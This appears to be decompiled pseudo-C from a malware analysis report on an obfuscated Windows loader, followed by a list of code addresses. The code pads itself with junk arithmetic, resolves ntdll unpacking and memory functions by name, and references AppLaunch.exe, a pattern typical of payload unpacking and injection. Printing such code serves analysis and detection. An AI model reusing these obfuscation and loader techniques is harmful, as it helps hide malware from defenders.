                                                														_v20 = _v32 + 0x26;
                                                														_t990 = E004FEF20; // 0x6e687a1a
                                                														 *0x4fef14 = _t990;
                                                														_v24 = 0x15 - _v16;
                                                														_t993 =  *0x4feeec; // 0xb52124f2
                                                														E004FEF38 = _t993 + 0x23;
                                                														_t995 =  *0x4feef4; // 0xb52124ca
                                                														_push(_t995);
                                                														_t1413 =  *0x4fef4c; // 0x43c1493c
                                                														_t1485 =  *0x4feed8; // 0x1cb9338e
                                                														_t996 =  *0x4fef3c; // 0x1cb932a9
                                                														E004FEF0C = E004EE798(_t996, _t1395, _t1413, _t1485, _t1631);
                                                														_t998 =  *0x4feecc; // 0xd26bafe0
                                                														E004FEF50 = _t998 -  *0x4fef18;
                                                														 *0x4feeb4 = GetProcAddress(_v36, "CreateFileW");
                                                														_v20 = _v28 + 0x3f;
                                                														_v12 = 0;
                                                														if(_v12 >= 0xa) {
                                                															L144:
                                                															asm("fild dword [0x4fef04]");
                                                															 *0x4feea0 = E004048D8();
                                                															_push(_v28);
                                                															_t1486 =  *0x4feee8; // 0xdcd0f434
                                                															E004FEF38 = E004EE798(_v12, _t1395, _v12, _t1486, _t1633);
                                                															 *0x4feeec =  *0x4feeec + 0xe0;
                                                															_t1009 =  *0x4fef48; // 0xc3c34ef0
                                                															 *0x4feef4 = _t1009;
                                                															_v36 = GetModuleHandleW(L"ntdll.dll");
                                                															if(_v36 == 0) {
                                                																L179:
                                                																asm("fild dword [ebp-0x1c]");
                                                																_v24 = E004048D8();
                                                																_v12 = 0;
                                                																if(_v12 >= 0xf) {
                                                																	L186:
                                                																	_t1013 = E004FEED0; // 0xc3c34ef0
                                                																	E004FEED0 = E0040489C(_t1013);
                                                																	_t1015 =  *0x4fef3c; // 0x1cb932a9
                                                																	 *0x4feee0 = _t1015 *  *0x4fef18;
                                                																	_t1488 =  *0x4feec0; // 0x0
                                                																	if(E00407774(L"AppLaunch.exe", 1, _t1488) != 0xea) {
                                                																		 *0x4fef18 = E004FEF38 * 0xbd;
                                                																	}
                                                																	_t1019 =  *0x4fef18; // 0xbc3e19a
                                                																	_v60 = _t1019 + 4;
                                                																	asm("fild dword [ebp-0x38]");
                                                																	 *0x4fef3c = E004048D8();
                                                																	goto L189;
                                                																} else {
                                                																	goto L180;
                                                																}
                                                																do {
                                                																	L180:
                                                																	_v12 = _v12 + 1;
                                                																	_t1023 =  *0x4fef3c; // 0x1cb932a9
                                                																	E004FEF34 = _t1023;
                                                																	_t1024 = E004FEF38; // 0xc3c34fdc
                                                																	E004FEF38 = E0040489C(_t1024);
                                                																	_t1026 = E004FEF34; // 0xc3c34ef0
                                                																	_t1660 = _t1026 - E004FEF38; // 0xc3c34fdc
                                                																	if(_t1660 >= 0) {
                                                																		L183:
                                                																		_v16 = 0;
                                                																		if(_v16 >= 0xe) {
                                                																			goto L185;
                                                																		} else {
                                                																			goto L184;
                                                																		}
                                                																		do {
                                                																			L184:
                                                																			_v16 = _v16 + 1;
                                                																			_t1028 =  *0x4fef04; // 0x43c14963
                                                																			 *0x4fef04 = E0040489C(_t1028);
                                                																		} while (_v16 < 0xe);
                                                																		goto L185;
                                                																	}
                                                																	_v28 = 0;
                                                																	do {
                                                																		E00407678(_v8, 0, 1,  &_v8);
                                                																		_v28 = _v28 + 1;
                                                																	} while (_v28 != 0xa);
                                                																	goto L183;
                                                																	L185:
                                                																} while (_v12 < 0xf);
                                                																goto L186;
                                                															}
                                                															_v32 = 0;
                                                															_t1635 = _v32 - 0xa;
                                                															if(_v32 < 0xa) {
                                                																_v32 = _v32 + 1;
                                                																_t1191 = E004FEF50; // 0xa3b3f6c0
                                                																 *0x4feecc = _t1191;
                                                																_t1192 =  *0x4feefc; // 0x4b08dcc7
                                                																_push(_t1192);
                                                																_t1429 =  *0x4feee8; // 0xdcd0f434
                                                																_t1506 =  *0x4feef0; // 0x44632301
                                                																_t1193 =  *0x4fef4c; // 0x43c1493c
                                                																 *0x4feee8 = E004EE798(_t1193, _t1395, _t1429, _t1506, _t1635);
                                                															}
                                                															_t1035 =  *0x4fef28; // 0x3c79b5d4
                                                															 *0x4feef0 = _t1035;
                                                															_t1036 =  *0x4feecc; // 0xd26bafe0
                                                															_t1636 = _t1036 -  *0x4feef0; // 0x44632301
                                                															if(_t1636 > 0) {
                                                																_v20 = _v16;
                                                																_t1187 =  *0x4fef18; // 0xbc3e19a
                                                																E004FEF2C = _t1187 - E004FEF20;
                                                																_t1189 = E004FEF00; // 0xa3b3f6c0
                                                																 *0x4fef44 = _t1189 + 4;
                                                															}
                                                															_t1037 =  *0x4fef30; // 0xa1d816
                                                															 *0x4feea0 = _t1037;
                                                															_t1038 =  *0x4fef14; // 0xb52124ca
                                                															 *0x4feecc = _t1038;
                                                															 *0x4feee0 = 0x99 - E004FEF2C;
                                                															E004FEF00 = E004FEF2C * 0xfe;
                                                															 *0x505914 = GetProcAddress(_v36, "RtlAllocateHeap");
                                                															_v28 = 0;
                                                															if(_v28 >= 4) {
                                                																L154:
                                                																E004FEF34 =  *0x4feef4 * 0x23;
                                                																_t1046 =  *0x4feedc; // 0xbc3e19a
                                                																 *0x4fef4c = _t1046 + 0xed;
                                                																_t1048 =  *0x4feef0; // 0x44632301
                                                																 *0x4feed8 = _t1048 + 4;
                                                																_t1050 =  *0x4fef4c; // 0x43c1493c
                                                																 *0x4feee0 = _t1050;
                                                																_t1051 = E004FEF38; // 0xc3c34fdc
                                                																 *0x4feee0 = _t1051;
                                                																_t1052 =  *0x4feee0; // 0x747938b
                                                																_t1641 = _t1052 -  *0x4feee0; // 0x747938b
                                                																if(_t1641 <= 0) {
                                                																	_t1053 =  *0x4feee8; // 0xdcd0f434
                                                																	_t1054 = _t1053 *  *0x4feefc;
                                                																	__eflags = _t1054;
                                                																	E004FEF2C = _t1054;
                                                																} else {
                                                																	 *0x4fef04 = 0xe9 - E004FEF20;
                                                																}
                                                																_push(_v28);
                                                																_t1417 = E004FEF20; // 0x6e687a1a
                                                																_t1056 =  *0x4fef30; // 0xa1d816
                                                																 *0x4fef3c = E004EE798(_t1056, _t1395, _t1417, _v28, _t1641);
                                                																 *0x505918 = GetProcAddress(_v36, "RtlDecompressBuffer");
                                                																 *0x505944 = GetProcAddress(_v36, "NtQueryVirtualMemory");
                                                																_v20 = _v28 - 0x77;
                                                																_v24 = _v32 - _v12;
                                                																_t1066 = E004FEF20; // 0x6e687a1a
                                                																 *0x4fef30 = _t1066;
                                                																_t1067 =  *0x4fef04; // 0x43c14963
                                                																E004FEF34 = _t1067;
                                                																_t1068 = E004FEF20; // 0x6e687a1a
                                                																 *0x4fef48 = _t1068 + 4;
                                                																 *0x505958 = GetProcAddress(_v36, "RtlGetLastWin32Error");
                                                																asm("fild dword [ebp-0x14]");
                                                																_v16 = E004048D8();
                                                																_v20 = _v32 * 0xdf;
                                                																_t1074 =  *0x4feee0; // 0x747938b
                                                																 *0x4fef14 = (_t1074 << 5) + (_t1074 << 5) * 4;
                                                																_t1077 = E004FEF20; // 0x6e687a1a
                                                																E004FEF20 = E0040489C(_t1077);
                                                																_t1079 = E004FEF10; // 0x1cb931c0
                                                																 *0x4fef28 = _t1079;
                                                																_t1080 =  *0x4fef28; // 0x3c79b5d4
                                                																_t1642 = _t1080 - E004FEF20; // 0x6e687a1a
                                                																if(_t1642 < 0) {
                                                																	_t1171 =  *0x4fef3c; // 0x1cb932a9
                                                																	E004FEF38 = _t1171;
                                                																	_t1172 = E004FEF38; // 0xc3c34fdc
                                                																	_t1643 = _t1172 - E004FEF20; // 0x6e687a1a
                                                																	if(_t1643 >= 0) {
                                                																		_t1173 =  *0x4feecc; // 0xd26bafe0
                                                																		_push(_t1173);
                                                																		_t1427 =  *0x4feeec; // 0xb52124f2
                                                																		_t1174 =  *0x4feefc; // 0x4b08dcc7
                                                																		 *0x4feee8 = E004EE798(_t1174, _t1395, _t1427, _v24, __eflags);
                                                																	} else {
                                                																		_t1176 =  *0x4fef28; // 0x3c79b5d4
                                                																		E004FEF50 = _t1176 +  *0x4fef28;
                                                																	}
                                                																}
                                                																_t1081 = E004FEF00; // 0xa3b3f6c0
                                                																E004FEF00 = E0040489C(_t1081);
                                                																 *0x4fef18 = 0xc8 -  *0x4fef18;
                                                																 *0x50595c = GetProcAddress(_v36, "RtlSetLastWin32Error");
                                                																_t1087 = E004FEF2C; // 0xa1d900
                                                																E004FEED0 = _t1087;
                                                																_v12 = 0;
                                                																do {
                                                																	_v24 = _v20 - _v28;
                                                																	_push(_v12);
                                                																	_t1492 = E004FEF50; // 0xa3b3f6c0
                                                																	 *0x4fef18 = E004EE798(_v24, _t1395, _v16, _t1492, 0);
                                                																	 *0x4fef28 = E004FEF38 * 0x57;
                                                																	_v12 = _v12 + 1;
                                                																	_t1645 = _v12 - 8;
                                                																} while (_v12 != 8);
                                                																_t1095 =  *0x4feea0; // 0xa1d900
                                                																_push(_t1095);
                                                																_t1493 =  *0x4fef14; // 0xb52124ca
                                                																E004FEF34 = E004EE798(_v24, _t1395, _v28, _t1493, _t1645);
                                                																asm("fild dword [0x4feecc]");
                                                																 *0x4fef4c = E004048CC();
                                                																_t1099 =  *0x4feee8; // 0xdcd0f434
                                                																E004FEED0 = _t1099 +  *0x4fef14;
                                                																_t1101 =  *0x4feee0; // 0x747938b
                                                																 *0x4feef0 = _t1101;
                                                																_t1102 = LoadLibraryW(L"shell32.dll"); // executed
                                                																_v36 = _t1102;
                                                																_v28 = _v32 - _v12;
                                                																_v24 = 0;
                                                																_push(_v32);
                                                																_t1107 =  *0x4feef0; // 0x44632301
                                                																E004EE798(_t1107, _t1395, _v28, _v32, _t1645);
                                                																_t1109 = E004FEF50; // 0xa3b3f6c0
                                                																E004FEF50 = E0040489C(_t1109);
                                                																_t1111 =  *0x4feeec; // 0xb52124f2
                                                																 *0x4feea0 = _t1111;
                                                																_t1112 =  *0x4feea0; // 0xa1d900
                                                																_t1646 = _t1112 - E004FEF50; // 0xa3b3f6c0
                                                																if(_t1646 > 0) {
                                                																	_t1168 =  *0x4fef48; // 0xc3c34ef0
                                                																	_push(_t1168);
                                                																	_t1502 =  *0x4fef4c; // 0x43c1493c
                                                																	_t1169 =  *0x4feefc; // 0x4b08dcc7
                                                																	 *0x4fef18 = E004EE798(_t1169, _t1395, _v28, _t1502, _t1646);
                                                																}
                                                																_t1113 =  *0x4feee8; // 0xdcd0f434
                                                																 *0x4fef18 =  *0x4fef18 + _t1113;
                                                																E00406CF4( &_v8, L"wdscore.dll");
                                                																_t1116 =  *0x4fef14; // 0xb52124ca
                                                																 *0x4fef30 = _t1116;
                                                																_t1117 = E004FEF34; // 0xc3c34ef0
                                                																if(_t1117 -  *0x4feef0 < 0xe2) {
                                                																	_t1166 =  *0x4feedc; // 0xbc3e19a
                                                																	 *0x4fef4c = _t1166 + 0xd8;
                                                																}
                                                																if(_v36 == 0) {
                                                																	goto L179;
                                                																} else {
                                                																	_t1119 = E004FEED0; // 0xc3c34ef0
                                                																	E004FEF10 = _t1119;
                                                																	_v24 = _v32 + 0x6c;
                                                																	_v20 = _v28;
                                                																	_t1123 =  *0x4feee8; // 0xdcd0f434
                                                																	 *0x4fef40 = _t1123 - 0x68;
                                                																	if(E00407774(L"NlsLexicons081a.dll", 1, _v8) != 0x2d) {
                                                																		E00406CF4( &_v8, _v8);
                                                																	}
                                                																	 *0x505960 = GetProcAddress(_v36, "SHGetSpecialFolderLocation");
                                                																	_v24 = _v16 + 4;
                                                																	_t1131 =  *0x4feed8; // 0x1cb9338e
                                                																	 *0x4fef3c = _t1131 +  *0x4fef40;
                                                																	_t1133 = E004FEED0; // 0xc3c34ef0
                                                																	_v60 = _t1133 + 4;
                                                																	asm("fild dword [ebp-0x38]");
                                                																	E004FEF50 = E004048D8();
                                                																	_t1651 = _v12 - _v28;
                                                																	if(_v12 > _v28) {
                                                																		_push(_v16);
                                                																		E004FEF00 = E004EE798(_v20, _t1395, _v16, _v28, _t1651);
                                                																		_push(_v32);
                                                																		_t1500 =  *0x4feee8; // 0xdcd0f434
                                                																		_t1162 =  *0x4feea0; // 0xa1d900
                                                																		 *0x4fef28 = E004EE798(_t1162, _t1395, _v12, _t1500, _t1651);
                                                																	}
                                                																	_push(_v12);
                                                																	_t1138 =  *0x4feefc; // 0x4b08dcc7
                                                																	E004EE798(_t1138, _t1395, _v12, _v16, _t1651);
                                                																	 *0x505964 = GetProcAddress(_v36, "SHGetPathFromIDListW");
                                                																	_v32 = 0;
                                                																	do {
                                                																		_v32 = _v32 + 1;
                                                																	} while (_v32 != 0x10);
                                                																	_v20 = 0;
                                                																	_t1654 = _v20 - 9;
                                                																	if(_v20 >= 9) {
                                                																		L178:
                                                																		asm("fild dword [0x4fef38]");
                                                																		 *0x4fef28 = E004048CC();
                                                																		_t1145 =  *0x4fef4c; // 0x43c1493c
                                                																		E004FEF38 = _t1145 << 6;
                                                																		_t1147 = E004FEF34; // 0xc3c34ef0
                                                																		 *0x4feea0 = _t1147 + 0xa;
                                                																		goto L179;
                                                																	} else {
                                                																		goto L175;
                                                																	}
                                                																	do {
                                                																		L175:
                                                																		_v20 = _v20 + 1;
                                                																		E004FEF2C = 0x4b -  *0x4fef44;
                                                																		_push(_v20);
                                                																		_t1152 =  *0x4feeec; // 0xb52124f2
                                                																		E004EE798(_t1152, _t1395, _v20, _v28, _t1654);
                                                																		_v28 = 0;
                                                																		if(_v28 >= 2) {
                                                																			goto L177;
                                                																		} else {
                                                																			goto L176;
                                                																		}
                                                																		do {
                                                																			L176:
                                                																			_v28 = _v28 + 1;
                                                																			_t1157 = E004FEF2C; // 0xa1d900
                                                																			E004FEED0 = _t1157;
                                                																		} while (_v28 < 2);
                                                																		L177:
                                                																		_t1155 =  *0x4feef4; // 0xb52124ca
                                                																		 *0x4feefc = _t1155 + E004FEF10;
                                                																	} while (_v20 < 9);
                                                																	goto L178;
                                                																}
                                                															} else {
                                                																do {
                                                																	_t429 =  &_v28;
                                                																	 *_t429 = _v28 + 1;
                                                																	_t1639 =  *_t429;
                                                																	_t1180 =  *0x4fef24; // 0x0
                                                																	E00407640(_t1180, L"WMPhoto.dll");
                                                																	if( *_t429 != 0) {
                                                																		asm("fild dword [ebp-0x14]");
                                                																		_v16 = E004048D8();
                                                																	} else {
                                                																		_push(_v32);
                                                																		_t1505 = E004FEF20; // 0x6e687a1a
                                                																		_t1184 = E004FEF38; // 0xc3c34fdc
                                                																		E004FEF34 = E004EE798(_t1184, _t1395, _v12, _t1505, _t1639);
                                                																	}
                                                																} while (_v28 < 4);
                                                																goto L154;
                                                															}
                                                														} else {
                                                															do {
                                                																_v12 = _v12 + 1;
                                                																_t1195 =  *0x4fef3c; // 0x1cb932a9
                                                																E004FEF38 = _t1195 * E004FEED0;
                                                																_t1633 = _v12 - 0xa;
                                                															} while (_v12 < 0xa);
                                                															goto L144;
                                                														}
                                                													} else {
                                                														do {
                                                															_v28 = _v28 + 1;
                                                															_v12 = 0;
                                                															if(_v12 < 0) {
                                                																_v12 = _v12 + 1;
                                                																E00406CF4( &_v8, L"cfgbkend.dll");
                                                															}
                                                															_v16 = 0;
                                                															if(_v16 < 1) {
                                                																do {
                                                																	_v16 = _v16 + 1;
                                                																	asm("fild dword [0x4fef00]");
                                                																	E004FEF10 = E004048CC();
                                                																} while (_v16 < 1);
                                                															}
                                                															_t1221 =  *0x4fef14; // 0xb52124ca
                                                															E004FEF2C = _t1221;
                                                															_t1621 = _v28 - 0xd;
                                                														} while (_v28 < 0xd);
                                                														goto L122;
                                                													}
                                                												}
                                                												_v28 = 0;
                                                												if(_v28 >= 0) {
                                                													L79:
                                                													_t1275 =  *0x4feea0; // 0xa1d900
                                                													 *0x4feef0 = _t1275 + 0x9b;
                                                													_t1277 = E004FEF2C; // 0xa1d900
                                                													 *0x4feefc = _t1277;
                                                													_t1278 =  *0x4fef28; // 0x3c79b5d4
                                                													 *0x4fef14 = _t1278 -  *0x4fef28;
                                                													goto L83;
                                                												} else {
                                                													goto L73;
                                                												}
                                                												do {
                                                													L73:
                                                													_v28 = _v28 + 1;
                                                													_v48 = _v8;
                                                													if(_v48 != 0) {
                                                														_v48 =  *((intOrPtr*)(_v48 - 4));
                                                													}
                                                													if(_v48 != 0xb1) {
                                                														_t1281 = E004FEF38 * 0xd5;
                                                														__eflags = _t1281;
                                                														E004FEF20 = _t1281;
                                                													} else {
                                                														E00407678(_v8, 0, 1,  &_v8);
                                                														E00406CF4( &_v8, _v8);
                                                														_v16 = _v24 * _v20;
                                                													}
                                                													E00407678(_v8, 0, 1,  &_v8);
                                                													_t1285 =  *0x4fef14; // 0xb52124ca
                                                													 *0x4feea0 = _t1285 + 4;
                                                												} while (_v28 < 0);
                                                												goto L79;
                                                											} else {
                                                												do {
                                                													_v32 = _v32 + 1;
                                                													_t1298 = E00407774(L"GetLocalManagedApplicationData", 1, _v8);
                                                													_t1591 = _t1298 - 0x4f;
                                                													if(_t1298 >= 0x4f) {
                                                														_t1300 = _v12 - _v16;
                                                														__eflags = _t1300;
                                                														_v20 = _t1300;
                                                													} else {
                                                														_t1302 =  *0x4fef40; // 0x3c79b5d4
                                                														_push(_t1302);
                                                														_t1440 =  *0x4fef18; // 0xbc3e19a
                                                														_t1303 =  *0x4feef4; // 0xb52124ca
                                                														 *0x4fef30 = E004EE798(_t1303, _t1395, _t1440, _v12, _t1591);
                                                													}
                                                													asm("fild dword [0x4feedc]");
                                                													E004FEF2C = E004048CC();
                                                													_t1592 = _v32 - 0xc;
                                                												} while (_v32 < 0xc);
                                                												goto L71;
                                                											}
                                                										}
                                                									} else {
                                                										goto L56;
                                                									}
                                                									do {
                                                										L56:
                                                										_v32 = _v32 + 1;
                                                										E00407678(_v8, 0, 1,  &_v8);
                                                									} while (_v32 < 4);
                                                								}
                                                								goto L59;
                                                							} else {
                                                								do {
                                                									_v32 = _v32 + 1;
                                                									_v40 = _v8;
                                                									if(_v40 != 0) {
                                                										_v40 =  *((intOrPtr*)(_v40 - 4));
                                                									}
                                                									if(_v40 > 0x52) {
                                                										_t1346 =  *0x4fef28; // 0x3c79b5d4
                                                										E004FEED0 = _t1346;
                                                									}
                                                									_t1341 =  *0x4fef4c; // 0x43c1493c
                                                									 *0x4feee0 = _t1341;
                                                									_v16 = 0;
                                                									if(_v16 < 9) {
                                                										do {
                                                											_v16 = _v16 + 1;
                                                											_v20 = _v24 * 0xe4;
                                                										} while (_v16 < 9);
                                                									}
                                                									_t1343 =  *0x4feecc; // 0xd26bafe0
                                                									E004FEF34 = _t1343 + 0x98;
                                                								} while (_v32 < 0xd);
                                                								goto L36;
                                                							}
                                                						}
                                                					}
                                                					_t1371 =  *0x4feea0; // 0xa1d900
                                                					 *0x4fef04 = _t1371;
                                                					_t1372 =  *0x4fef40; // 0x3c79b5d4
                                                					E004FEF0C = _t1372;
                                                					_t1373 = E004FEF50; // 0xa3b3f6c0
                                                					_v60 = _t1373 + 4;
                                                					asm("fild dword [ebp-0x38]");
                                                					 *0x4fef28 = E004048D8();
                                                					_t1376 =  *0x4fef30; // 0xa1d816
                                                					 *0x4fef30 = E0040489C(_t1376);
                                                					_t1378 =  *0x4fef30; // 0xa1d816
                                                					_t1549 = _t1378 - E004FEF0C; // 0xb52124bf
                                                					if(_t1549 >= 0) {
                                                						goto L10;
                                                					}
                                                					_v12 = 0;
                                                					if(_v12 >= 4) {
                                                						goto L10;
                                                					} else {
                                                						goto L9;
                                                					}
                                                					do {
                                                						L9:
                                                						_v12 = _v12 + 1;
                                                						_t1380 =  *0x4fef4c; // 0x43c1493c
                                                						 *0x4feea0 = _t1380;
                                                					} while (_v12 < 4);
                                                					goto L10;
                                                				} else {
                                                					goto L1;
                                                				}
                                                				do {
                                                					L1:
                                                					_v32 = _v32 + 1;
                                                					_t1535 =  *0x4fef24; // 0x0
                                                					if(E00407774(L"tssysprep.dll", 1, _t1535) != 0xcc) {
                                                						_v12 = _v24 + 0xa3;
                                                					}
                                                					_t1387 = E004FEF38; // 0xc3c34fdc
                                                					 *0x4feef0 = _t1387;
                                                					_t1388 = E004FEF34; // 0xc3c34ef0
                                                					E004FEF0C = _t1388 + 0x35;
                                                					_t1390 = E004FEF34; // 0xc3c34ef0
                                                					E004FEF2C = _t1390 +  *0x4fef3c;
                                                					asm("fild dword [0x4fef44]");
                                                					 *0x4fef3c = E004048CC();
                                                				} while (_v32 < 2);
                                                				goto L4;
                                                			}









































































































































































































































































































































































                                                0x004ee96c
                                                0x004ee96d
                                                0x004ee96f
                                                0x004ee972
                                                0x004ee977
                                                0x004ee97c
                                                0x004ee97d
                                                0x004ee982
                                                0x004ee985
                                                0x004ee98a
                                                0x004ee98b
                                                0x004ee990
                                                0x004ee993
                                                0x004ee998
                                                0x004ee99f
                                                0x004eea08
                                                0x004eea08
                                                0x004eea13
                                                0x004eea26
                                                0x004eea2b
                                                0x004eea39
                                                0x004eea3b
                                                0x004eea46
                                                0x004eea4b
                                                0x004eea55
                                                0x004eea55
                                                0x004eea64
                                                0x004eea69
                                                0x004eea74
                                                0x004eea83
                                                0x004eea8c
                                                0x004eea98
                                                0x004eeb00
                                                0x004eeb00
                                                0x004eeb0b
                                                0x004eeb10
                                                0x004eeb1b
                                                0x004eeb20
                                                0x004eeb2b
                                                0x004eeb30
                                                0x004eeb3b
                                                0x004eeb44
                                                0x004f05fe
                                                0x004f05fe
                                                0x004f0606
                                                0x004f0609
                                                0x004f0614
                                                0x004f0619
                                                0x004f0621
                                                0x004f0626
                                                0x004f062e
                                                0x004f063c
                                                0x004f063e
                                                0x004f0649
                                                0x004f0649
                                                0x004f0650
                                                0x004f0653
                                                0x004f07e6
                                                0x004f07e9
                                                0x004f07ec
                                                0x004f07f9
                                                0x004eeb4a
                                                0x004eeb58
                                                0x004eeb65
                                                0x004eeb6e
                                                0x004eeb78
                                                0x004eeb7d
                                                0x004eeb85
                                                0x004eeb8a
                                                0x004eeb95
                                                0x004eeba3
                                                0x004eebb1
                                                0x004eebb6
                                                0x004eeba5
                                                0x004eeba5
                                                0x004eebaa
                                                0x004eebaa
                                                0x004eebc2
                                                0x004eebd5
                                                0x004eebdc
                                                0x004eebe3
                                                0x004eebe5
                                                0x004eebe8
                                                0x004eebed
                                                0x004eebf2
                                                0x004eebf7
                                                0x004eebfc
                                                0x004eec01
                                                0x004eec07
                                                0x004eec14
                                                0x004eec1f
                                                0x004eec09
                                                0x004eec0f
                                                0x004eec0f
                                                0x004eec07
                                                0x004eec2c
                                                0x004eec37
                                                0x004eec3c
                                                0x004eec46
                                                0x004eec49
                                                0x004eec51
                                                0x004eec56
                                                0x004eec61
                                                0x004eec66
                                                0x004eec71
                                                0x004eec77
                                                0x004eec79
                                                0x004eec83
                                                0x004eec83
                                                0x004eec88
                                                0x004eec8d
                                                0x004eeca0
                                                0x004eeca7
                                                0x004eecaa
                                                0x004eecaa
                                                0x004eecaf
                                                0x004eecb4
                                                0x004eecb7
                                                0x004eecbd
                                                0x004eecc2
                                                0x004eecc7
                                                0x004eecd1
                                                0x004eecd6
                                                0x004eecdb
                                                0x004eece1
                                                0x004eecea
                                                0x004eecf5
                                                0x004eecf5
                                                0x004eed0a
                                                0x004eed0c
                                                0x004eed17
                                                0x004eed1c
                                                0x004eed27
                                                0x004eed2d
                                                0x004eed2f
                                                0x004eed37
                                                0x004eed37
                                                0x004eed3c
                                                0x004eed41
                                                0x004eed41
                                                0x004eed47
                                                0x004eed47
                                                0x004eed4c
                                                0x004eed51
                                                0x004eed59
                                                0x004eed5a
                                                0x004eed60
                                                0x004eed6e
                                                0x004eed81
                                                0x004eed88
                                                0x004eed8f
                                                0x004eedf8
                                                0x004eedf8
                                                0x004eedfd
                                                0x004eee02
                                                0x004eee0d
                                                0x004eee12
                                                0x004eee17
                                                0x004eee1c
                                                0x004eee21
                                                0x004eee28
                                                0x004eee32
                                                0x004eee32
                                                0x004eee3c
                                                0x004eee48
                                                0x004eee48
                                                0x004eee4d
                                                0x004eee58
                                                0x004eee5e
                                                0x004eee6f
                                                0x004eee7a
                                                0x004eee80
                                                0x004eee9f
                                                0x004eeea3
                                                0x004eeeac
                                                0x004eee82
                                                0x004eee82
                                                0x004eee8a
                                                0x004eee8d
                                                0x004eee95
                                                0x004eee95
                                                0x004eee60
                                                0x004eee60
                                                0x004eee68
                                                0x004eee68
                                                0x004eeebf
                                                0x004eeed2
                                                0x004eeed7
                                                0x004eeee1
                                                0x004eeee6
                                                0x004eeeeb
                                                0x004eeef0
                                                0x004eeef5
                                                0x004eeefb
                                                0x004eeefd
                                                0x004eef02
                                                0x004eef07
                                                0x004eef11
                                                0x004eef1c
                                                0x004eef25
                                                0x004eef25
                                                0x004eef36
                                                0x004eef38
                                                0x004eef43
                                                0x004eef43
                                                0x004eef48
                                                0x004eef52
                                                0x004eef57
                                                0x004eef5c
                                                0x004eef62
                                                0x004eef94
                                                0x004eef99
                                                0x004eef9e
                                                0x004eefa8
                                                0x004eefad
                                                0x004eefb2
                                                0x004eefb2
                                                0x004eefb7
                                                0x004eef64
                                                0x004eef6c
                                                0x004eef71
                                                0x004eef82
                                                0x004eef8d
                                                0x004eef73
                                                0x004eef7b
                                                0x004eef7b
                                                0x004eef71
                                                0x004eefbc
                                                0x004eefc4
                                                0x004eefc9
                                                0x004eefd1
                                                0x004eefe4
                                                0x004eefe9
                                                0x004eeff4
                                                0x004eeffa
                                                0x004ef025
                                                0x004ef025
                                                0x004ef02c
                                                0x004eeffc
                                                0x004eeffe
                                                0x004ef005
                                                0x004ef02f
                                                0x004ef02f
                                                0x004ef037
                                                0x004ef03a
                                                0x004ef042
                                                0x004ef047
                                                0x004ef04c
                                                0x004ef05f
                                                0x004ef064
                                                0x004ef06f
                                                0x004ef07d
                                                0x004ef07f
                                                0x004ef084
                                                0x004ef084
                                                0x004ef089
                                                0x004ef089
                                                0x004ef09c
                                                0x004ef0a7
                                                0x004ef0b0
                                                0x004ef0b3
                                                0x004ef0bb
                                                0x004ef0c0
                                                0x004ef0c8
                                                0x004ef0cd
                                                0x004ef0d2
                                                0x004ef0e1
                                                0x004ef0e6
                                                0x004ef0eb
                                                0x004ef0fe
                                                0x004ef10b
                                                0x004ef114
                                                0x004ef117
                                                0x004ef121
                                                0x004ef126
                                                0x004ef131
                                                0x004ef136
                                                0x004ef141
                                                0x004ef146
                                                0x004ef151
                                                0x004ef164
                                                0x004ef173
                                                0x004ef17c
                                                0x004ef185
                                                0x004ef188
                                                0x004ef193
                                                0x004ef198
                                                0x004ef1a3
                                                0x004ef1a8
                                                0x004ef1ad
                                                0x004ef1b2
                                                0x004ef1ba
                                                0x004ef1c0
                                                0x004ef1ca
                                                0x004ef1ca
                                                0x004ef1d3
                                                0x004f059c
                                                0x004f05a2
                                                0x004f05a5
                                                0x004f05ad
                                                0x004f05b0
                                                0x004f05b8
                                                0x004f05bd
                                                0x004f05c2
                                                0x004f05c7
                                                0x004f05cc
                                                0x004f05d1
                                                0x004f05d6
                                                0x004f05dc
                                                0x004f05e9
                                                0x004f05e9
                                                0x004f05ee
                                                0x004f05f9
                                                0x00000000
                                                0x004ef1d9
                                                0x004ef1dc
                                                0x004ef1df
                                                0x004ef1e4
                                                0x004ef1e9
                                                0x004ef1f3
                                                0x004ef1f6
                                                0x004ef1fe
                                                0x004ef203
                                                0x004ef20e
                                                0x004ef21a
                                                0x004ef21c
                                                0x004ef221
                                                0x004ef228
                                                0x004ef232
                                                0x004ef232
                                                0x004ef237
                                                0x004ef241
                                                0x004ef246
                                                0x004ef24e
                                                0x004ef251
                                                0x004ef259
                                                0x004ef26c
                                                0x004ef273
                                                0x004ef27a
                                                0x004ef2d5
                                                0x004ef2d5
                                                0x004ef2da
                                                0x004ef2db
                                                0x004ef2e1
                                                0x004ef2e7
                                                0x004ef2f1
                                                0x004ef2f6
                                                0x004ef2fb
                                                0x004ef300
                                                0x004ef305
                                                0x004ef30a
                                                0x004ef312
                                                0x004ef317
                                                0x004ef31c
                                                0x004ef320
                                                0x004ef326
                                                0x004ef330
                                                0x004ef343
                                                0x004ef356
                                                0x004ef35b
                                                0x004ef366
                                                0x004ef374
                                                0x004ef439
                                                0x004ef444
                                                0x004ef44a
                                                0x004ef44c
                                                0x004ef451
                                                0x004ef451
                                                0x004ef457
                                                0x004ef457
                                                0x004ef45c
                                                0x004ef461
                                                0x004ef466
                                                0x004ef466
                                                0x004ef470
                                                0x004ef475
                                                0x004ef47f
                                                0x004ef484
                                                0x004ef484
                                                0x004ef489
                                                0x004ef490
                                                0x004ef49a
                                                0x004ef49a
                                                0x004ef4a1
                                                0x004ef4a3
                                                0x004ef4a8
                                                0x004ef4ad
                                                0x004ef4b2
                                                0x004ef4b7
                                                0x004ef4bc
                                                0x004ef4c1
                                                0x004ef4c6
                                                0x004ef4cc
                                                0x004ef4ce
                                                0x004ef4d9
                                                0x004ef4d9
                                                0x004ef4de
                                                0x004ef4e8
                                                0x004ef4eb
                                                0x004ef4f3
                                                0x004ef4f3
                                                0x004ef4f8
                                                0x004ef4fd
                                                0x004ef503
                                                0x004ef508
                                                0x004ef50d
                                                0x004ef512
                                                0x004ef518
                                                0x004ef529
                                                0x004ef534
                                                0x004ef51a
                                                0x004ef51a
                                                0x004ef522
                                                0x004ef522
                                                0x004ef539
                                                0x004ef544
                                                0x004ef554
                                                0x004ef567
                                                0x004ef56c
                                                0x004ef576
                                                0x004ef57b
                                                0x004ef580
                                                0x004ef585
                                                0x004ef58a
                                                0x004ef590
                                                0x004ef5f2
                                                0x004ef5f7
                                                0x004ef5f9
                                                0x004ef5fe
                                                0x004ef601
                                                0x004ef605
                                                0x004ef60a
                                                0x004ef60a
                                                0x004ef60f
                                                0x004ef60f
                                                0x004ef612
                                                0x004ef616
                                                0x004ef61b
                                                0x004ef61c
